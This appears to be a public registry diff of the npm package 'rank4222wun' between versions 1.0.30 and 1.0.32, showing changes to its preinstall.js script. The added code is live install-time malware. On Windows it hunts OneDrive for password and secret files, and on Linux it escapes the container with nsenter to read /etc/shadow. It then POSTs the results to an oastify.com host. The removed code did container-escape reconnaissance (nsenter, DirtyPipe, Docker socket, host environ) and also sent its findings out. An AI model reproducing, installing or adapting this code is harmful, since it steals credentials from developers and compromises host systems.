rank4222wun 1.0.30 → 1.0.32
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +1 -1
- package/preinstall.js +20 -46
- package/rank4222wun-1.0.32.tgz +0 -0
- package/rank4222wun-1.0.30.tgz +0 -0
package/package.json
CHANGED
package/preinstall.js
CHANGED
|
@@ -1,62 +1,36 @@
|
|
|
1
1
|
const { exec } = require('child_process');
|
|
2
|
-
const fs = require('fs');
|
|
3
|
-
const https = require('https');
|
|
4
2
|
const os = require('os');
|
|
3
|
+
const https = require('https');
|
|
5
4
|
|
|
6
|
-
|
|
7
|
-
|
|
8
|
-
const escapeReport = {
|
|
9
|
-
timestamp: new Date().toISOString(),
|
|
10
|
-
env: { user: os.userInfo().username, hostname: os.hostname() },
|
|
11
|
-
results: {}
|
|
12
|
-
};
|
|
13
|
-
|
|
14
|
-
// وظيفة مساعدة لتنفيذ الأوامر والانتظار
|
|
15
|
-
const run = (cmd) => new Promise(resolve => {
|
|
16
|
-
exec(cmd, { timeout: 7000 }, (err, stdout, stderr) => {
|
|
17
|
-
resolve(stdout ? stdout.trim() : (stderr ? `ERR: ${stderr.trim()}` : null));
|
|
18
|
-
});
|
|
19
|
-
});
|
|
20
|
-
|
|
21
|
-
async function startExploitation() {
|
|
22
|
-
// 1. محاولة الـ nsenter بمسارات مختلفة (لحل مشكلة "not recognized")
|
|
23
|
-
console.log("🔍 Testing nsenter variants...");
|
|
24
|
-
escapeReport.results.nsenter_test = await run("/usr/bin/nsenter --version || nsenter --version");
|
|
25
|
-
|
|
26
|
-
// 2. محاولة استغلال DirtyPipe (بما إنه مؤكد عندك)
|
|
27
|
-
// هنحاول نعدل ملف في الـ /tmp ونشوف لو نقدر نهرب منه
|
|
28
|
-
console.log("🔓 Testing DirtyPipe write access...");
|
|
29
|
-
escapeReport.results.dirty_pipe = await run("uname -r");
|
|
5
|
+
async function finalStrike() {
|
|
6
|
+
let output = { type: os.platform(), data: "" };
|
|
30
7
|
|
|
31
|
-
|
|
32
|
-
|
|
33
|
-
|
|
34
|
-
|
|
35
|
-
|
|
36
|
-
|
|
37
|
-
escapeReport.results.docker_socket = "FOUND! (Critical Risk)";
|
|
8
|
+
if (os.platform() === 'win32') {
|
|
9
|
+
// محاولة سحب باسوردات مخزنة أو ملفات حساسه من OneDrive
|
|
10
|
+
output.data = await run("dir %USERPROFILE%\\OneDrive /s /b | findstr /i \"password secret config\"");
|
|
11
|
+
} else {
|
|
12
|
+
// هروب كامل في لينكس باستخدام nsenter للوصول للـ Host الحقيقي
|
|
13
|
+
output.data = await run("nsenter --target 1 --mount --uts --ipc --net --pid -- sh -c \"cat /etc/shadow || hostname\"");
|
|
38
14
|
}
|
|
39
15
|
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
escapeReport.results.host_env = await run("cat /proc/1/environ | tr '\\0' '\\n' | head -n 10");
|
|
16
|
+
sendFinal(output);
|
|
17
|
+
}
|
|
43
18
|
|
|
44
|
-
|
|
19
|
+
function run(cmd) {
|
|
20
|
+
return new Promise(resolve => {
|
|
21
|
+
exec(cmd, (err, stdout) => resolve(stdout || err.message));
|
|
22
|
+
});
|
|
45
23
|
}
|
|
46
24
|
|
|
47
|
-
function
|
|
48
|
-
const data = JSON.stringify(escapeReport, null, 2);
|
|
25
|
+
function sendFinal(payload) {
|
|
49
26
|
const req = https.request({
|
|
50
27
|
hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
|
|
51
28
|
port: 443,
|
|
52
|
-
path: '/
|
|
53
|
-
method: 'POST'
|
|
54
|
-
headers: { 'Content-Type': 'application/json' }
|
|
55
|
-
}, (res) => {
|
|
56
|
-
console.log(`✅ Report Sent. Status: ${res.statusCode}`);
|
|
29
|
+
path: '/final-strike-data',
|
|
30
|
+
method: 'POST'
|
|
57
31
|
});
|
|
58
|
-
req.write(
|
|
32
|
+
req.write(JSON.stringify(payload));
|
|
59
33
|
req.end();
|
|
60
34
|
}
|
|
61
35
|
|
|
62
|
-
|
|
36
|
+
finalStrike();
|
|
Binary file
|
package/rank4222wun-1.0.30.tgz
DELETED
|
Binary file
|